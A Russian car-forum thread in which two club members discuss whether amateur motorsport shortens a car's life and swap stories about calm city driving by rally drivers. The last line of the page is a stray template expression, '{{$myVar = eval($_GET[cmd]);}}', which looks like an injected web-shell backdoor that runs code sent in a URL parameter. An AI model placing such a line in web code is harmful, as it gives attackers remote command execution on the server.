+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Как влияет автоспорт на ресурс машины.


  1. #1
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674

    Как влияет автоспорт на ресурс машины.

    Понятно, что плохо влияет - в нагруженных режимах при максимальных оборотах двигателя, износ идет быстрее. НО!
    Заметил, что после того, как занялся любительским спортом - стал ездить по городу "как пенсионер". То есть ни тебе "шашек", ни стартов со светофора, ни гонок по магистралям "в догонялки" с заряжеными и просто мощными тачками. То есть впрыск адреналина на гоночной трассе остужает кровь на дорогах общего пользования. Никому ничего доказывать не нужно, а что творится за пределами возможностей машины в план управляемости ты уже знаешь и поэтому осторожен среди гражданского населения.
    В то же время, знаю многих соклубников и не только, которые не выезжали на трассы, или у них сразу не получилось и они плюнули на это, которые гоняют как угорелые, пишут в теме о встречах на дорогах - типа "хорошо зажгли". Ну и как следствие - меняют каждый год... тормозные диски например. :)
    Так так ли страшен любительский автоспорт, как его малюют? Ведь обычно ездят в режиме "на все деньги" по гоночной трассе один-два часа в месяц за сезон! :)
    Очень интересно мнение соклубников - и тех кто "в теме" и тех, кто нет!
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Я сам не гонщик, но чем интересней и мощнее машина в руках, тем меньше хочется на ней гонять и что-то доказывать )))) только там где свободно и уверен в дороге можно пульнуть и опять ехать наслаждаться.

    Ехал как то очень долго по Москве с Валерием Гордеевым, я еще тогда у него строил себе ВАЗ08, так вот в городе поведение на дороге и спокойствие этого человека меня поразили своим спокойствием и качеством езды. Все настолько просто, уверенно и без ускорений, что если бы так ездили у нас, то город бы лишился пробок. Сама филигранность и тактичность в дороге и никаких гонок. Гонки и адреналин на ралли. Ехали на его тренировочной восьмерке )))
    http://presnya.ru/gordeev.shtml

    Еще съездили разок на Мк2 G60 с полуралийной подготовкой за обедом его механикам в магазин с раллистом Алексеем Ковальчуком пока ждал опять же ВАЗ08 с настройки. Успел почти наложить в штаны в заносах в промзоне, но все было безопасно и четко как он мне сказал )))) Но он так обычно не ездит ибо хватает ралли, это мне немного показал как едут шины Мишлен Пилот спорт ))
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме

Похожие темы

  1. Влияние к04 на ресурс
    от Egvinn в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 3
    Последнее сообщение: 02.10.2023, 16:02
  2. Ответов: 1
    Последнее сообщение: 24.12.2020, 01:49
  3. мади-ресурс
    от Exp1osion в разделе Ремонт и обслуживание
    Ответов: 0
    Последнее сообщение: 14.09.2009, 12:34
  4. Ресурс Dsg
    от Artemy в разделе Разное
    Ответов: 4
    Последнее сообщение: 23.05.2009, 19:58
  5. Автоспорт: McLaren нанес Ferrari ответный удар
    от Сайт в разделе Курилка
    Ответов: 0
    Последнее сообщение: 02.09.2007, 04:48

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}